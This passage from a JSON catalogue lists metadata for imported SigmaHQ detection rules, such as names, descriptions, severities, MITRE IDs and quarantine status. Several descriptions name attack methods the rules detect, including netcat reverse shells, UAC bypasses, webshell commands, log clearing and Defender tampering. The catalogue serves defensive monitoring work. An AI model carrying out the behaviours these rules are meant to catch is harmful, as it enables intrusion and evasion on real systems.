"BitLockerTogo.EXE Execution", "description": "Detects the execution of \"BitLockerToGo.EXE\".\nBitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system.\nThis is a rarely used application and usage of it at all is worth investigating.\nMalware such as Lumma stealer has been seen using this process as a target for process hollowing.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitlockertogo-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f2376f9-42ee-4dfc-9360-fecff9a88fc8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bitlockertogo_execution.yml" } }, { "id": "sigmahq-sigma-7f2954d2-99c2-4d42-a065-ca36740f187b", "type": "detection", "name": "Hypervisor Enforced Paging Translation Disabled", "description": "Detects changes to the \"DisableHypervisorEnforcedPagingTranslation\" registry value. Where the it is set to \"1\" in order to disable the Hypervisor Enforced Paging Translation feature.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hypervisor-enforced-paging-translation-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f2954d2-99c2-4d42-a065-ca36740f187b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedpagingtranslation_disabled.yml" } }, { "id": "sigmahq-sigma-7f2bb9d5-6395-4de5-969c-70c11fbe6b12", "type": "detection", "name": "Split A File Into Pieces", "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1030" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/split-a-file-into-pieces.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f2bb9d5-6395-4de5-969c-70c11fbe6b12", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml" } }, { "id": "sigmahq-sigma-7f3a9c2d-4e8b-4a7f-9d3e-5c6f8a9b2e1d", "type": "detection", "name": "OpenEDR Spawning Command Shell", "description": "Detects the OpenEDR ssh-shellhost.exe spawning a command shell (cmd.exe) or PowerShell with PTY (pseudo-terminal) capabilities.\nThis may indicate remote command execution through OpenEDR's remote management features, which could be legitimate administrative activity or potential abuse of the remote access tool.\nThreat actors may leverage OpenEDR's remote shell capabilities to execute commands on compromised systems, facilitating lateral movement or other command-and-control operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003", "T1021.004", "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/openedr-spawning-command-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f3a9c2d-4e8b-4a7f-9d3e-5c6f8a9b2e1d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_comodo_ssh_shellhost_cmd_spawn.yml" } }, { "id": "sigmahq-sigma-7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", "type": "detection", "name": "Execute From Alternate Data Streams", "description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execute-from-alternate-data-streams.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml" } }, { "id": "sigmahq-sigma-7f4c43f9-b1a5-4c7d-b24a-b41bf3a3ebf2", "type": "detection", "name": "Registry Tampering by Potentially Suspicious Processes", "description": "Detects suspicious registry modifications made by suspicious processes such as script engine processes such as WScript, or CScript etc.\nThese processes are rarely used for legitimate registry modifications, and their activity may indicate an attempt to modify the registry\nwithout using standard tools like regedit.exe or reg.exe, potentially for evasion and persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-tampering-by-potentially-suspicious-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f4c43f9-b1a5-4c7d-b24a-b41bf3a3ebf2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_susp_process_registry_modification.yml" } }, { "id": "sigmahq-sigma-7f5d1c9a-3e83-48df-95a7-2b98aae6c13c", "type": "detection", "name": "Potential Provlaunch.EXE Binary Proxy Execution Abuse", "description": "Detects child processes of \"provlaunch.exe\" which might indicate potential abuse to proxy execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-provlaunch-exe-binary-proxy-execution-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f5d1c9a-3e83-48df-95a7-2b98aae6c13c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml" } }, { "id": "sigmahq-sigma-7f734ed0-4f47-46c0-837f-6ee62505abd9", "type": "detection", "name": "Potential Netcat Reverse Shell Execution", "description": "Detects execution of netcat with the \"-e\" flag followed by common shells. This could be a sign of a potential reverse shell setup.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-netcat-reverse-shell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f734ed0-4f47-46c0-837f-6ee62505abd9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml" } }, { "id": "sigmahq-sigma-7f741dcf-fc22-4759-87b4-9ae8376676a2", "type": "detection", "name": "Bypass UAC via Fodhelper.exe", "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bypass-uac-via-fodhelper-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml" } }, { "id": "sigmahq-sigma-7f7c49eb-2977-4ac8-8ab0-ab1bae14730e", "type": "detection", "name": "Remote Schedule Task Recon via ITaskSchedulerService", "description": "Detects remote RPC calls to read information about scheduled tasks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-schedule-task-recon-via-itaskschedulerservice.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f7c49eb-2977-4ac8-8ab0-ab1bae14730e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" } }, { "id": "sigmahq-sigma-7fd164ba-126a-4d9c-9392-0d4f7c243df0", "type": "detection", "name": "OneNote Attachment File Dropped In Suspicious Location", "description": "Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/onenote-attachment-file-dropped-in-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml" } }, { "id": "sigmahq-sigma-7ff9db12-1b94-4a79-ba68-a2402c5d6729", "type": "detection", "name": "Windows Webshell Strings", "description": "Detects common commands used in Windows webshells", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-webshell-strings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7ff9db12-1b94-4a79-ba68-a2402c5d6729", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_win_webshells_in_access_logs.yml" } }, { "id": "sigmahq-sigma-7fff6773-2baa-46de-a24a-b6eec1aba2d1", "type": "detection", "name": "UAC Bypass Using NTFS Reparse Point - File", "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-ntfs-reparse-point-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml" } }, { "id": "sigmahq-sigma-801bd44f-ceed-4eb6-887c-11544633c0aa", "type": "detection", "name": "Windows Defender Configuration Changes", "description": "Detects suspicious changes to the Windows Defender configuration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-configuration-changes.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "801bd44f-ceed-4eb6-887c-11544633c0aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml" } }, { "id": "sigmahq-sigma-8023f872-3f1d-4301-a384-801889917ab4", "type": "detection", "name": "Usage of Renamed Sysinternals Tools - RegistrySet", "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/usage-of-renamed-sysinternals-tools-registryset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8023f872-3f1d-4301-a384-801889917ab4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml" } }, { "id": "sigmahq-sigma-8028c2c3-e25a-46e3-827f-bbb5abf181d7", "type": "detection", "name": "WMImplant Hack Tool", "description": "Detects parameters used by WMImplant", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmimplant-hack-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_wmimplant.yml" } }, { "id": "sigmahq-sigma-805c55d9-31e6-4846-9878-c34c75054fe9", "type": "detection", "name": "Octopus Scanner Malware", "description": "Detects Octopus Scanner Malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1195", "T1195.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/octopus-scanner-malware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "805c55d9-31e6-4846-9878-c34c75054fe9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_mal_octopus_scanner.yml" } }, { "id": "sigmahq-sigma-808146b2-9332-4d78-9416-d7e47012d83d", "type": "detection", "name": "BPFDoor Abnormal Process ID or Lock File Accessed", "description": "detects BPFDoor .lock and .pid files access in temporary file storage facility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1106", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bpfdoor-abnormal-process-id-or-lock-file-accessed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "808146b2-9332-4d78-9416-d7e47012d83d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/path/lnx_auditd_bpfdoor_file_accessed.yml" } }, { "id": "sigmahq-sigma-80915f59-9b56-4616-9de0-fd0dea6c12fe", "type": "detection", "name": "Linux Logs Clearing Attempts", "description": "Detects logs clearing attempts on Linux systems via utilities such as 'rm', 'rmdir', 'shred', and 'unlink' targeting log files and directories.\nAdversaries often try to clear logs to cover their tracks after performing malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1685.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/linux-logs-clearing-attempts.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "80915f59-9b56-4616-9de0-fd0dea6c12fe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_clear_logs.yml" } }, { "id": "sigmahq-sigma-80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "type": "detection", "name": "Invoke-Obfuscation Via Stdin - Security", "description": "Detects Obfuscated Powershell via Stdin in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-stdin-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml" } }, { "id": "sigmahq-sigma-80e1f67a-4596-4351-98f5-a9c3efabac95", "type": "detection", "name": "Suspicious Scheduled Task Write to System32 Tasks", "description": "Detects the creation of tasks from processes executed from suspicious locations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-scheduled-task-write-to-system32-tasks.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "80e1f67a-4596-4351-98f5-a9c3efabac95", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_task_write.yml" } }, { "id": "sigmahq-sigma-80eeab92-0979-4152-942d-96749e11df40", "type": "detection", "name": "Azure Keyvault Key Modified or Deleted", "description": "Identifies when a Keyvault Key is modified or deleted in Azure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552", "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-keyvault-key-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "80eeab92-0979-4152-942d-96749e11df40", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_keyvault_key_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-80fc36aa-945e-4181-89f2-2f907ab6775d", "type": "detection", "name": "UAC Bypass Using IEInstal - Process", "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-ieinstal-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "80fc36aa-945e-4181-89f2-2f907ab6775d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml" } }, { "id": "sigmahq-sigma-811e0002-b13b-4a15-9d00-a613fce66e42", "type": "detection", "name": "PUA - Process Hacker Execution", "description": "Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc).\nProcess Hacker is a tool to view and manipulate processes, kernel options and other low level options.\nThreat actors abused older vulnerable versions to manipulate system processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1622", "T1564", "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-process-hacker-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "811e0002-b13b-4a15-9d00-a613fce66e42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_process_hacker.yml" } }, { "id": "sigmahq-sigma-811f459f-9231-45d4-959a-0266c6311987", "type": "detection", "name": "Suspicious Child Process Of BgInfo.EXE", "description": "Detects suspicious child processes of \"BgInfo.exe\" which could be a sign of potential abuse of the binary to proxy execution via external VBScript", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1218", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-child-process-of-bginfo-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "811f459f-9231-45d4-959a-0266c6311987", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml" } }, { "id": "sigmahq-sigma-81315b50-6b60-4d8f-9928-3466e1022515", "type": "detection", "name": "Desktop.INI Created by Uncommon Process", "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/desktop-ini-created-by-uncommon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "81315b50-6b60-4d8f-9928-3466e1022515", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_desktop_ini_created_by_uncommon_process.yml" } }, { "id": "sigmahq-sigma-81325ce1-be01-4250-944f-b4789644556f", "type": "detection", "name": "Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE", "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/schedule-task-creation-from-env-variable-or-potentially-suspicious-path-via-scht.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "81325ce1-be01-4250-944f-b4789644556f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_env_folder.yml" } }, { "id": "sigmahq-sigma-814c95cc-8192-4378-a70a-f1aafd877af1", "type": "detection", "name": "Use of OpenConsole", "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-openconsole.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "814c95cc-8192-4378-a70a-f1aafd877af1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml" } }, { "id": "sigmahq-sigma-814ddeca-3d31-4265-8e07-8cc54fb44903", "type": "detection", "name": "LiveKD Kernel Memory Dump File Created", "description": "Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/livekd-kernel-memory-dump-file-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "814ddeca-3d31-4265-8e07-8cc54fb44903", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_sysinternals_livekd_default_dump_name.yml" } }, { "id": "sigmahq-sigma-8150732a-0c9d-4a99-82b9-9efb9b90c40c", "type": "detection", "name": "Suspicious Msiexec Quiet Install From Remote Location", "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-msiexec-quiet-install-from-remote-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml" } }, { "id": "sigmahq-sigma-815bfc17-7fc6-4908-a55e-2f37b98cedb4", "type": "detection", "name": "AD Groups Or Users Enumeration Using PowerShell - PoshModule", "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.", "version": "1.0.0", "author": "AiSOC", "tags": [ 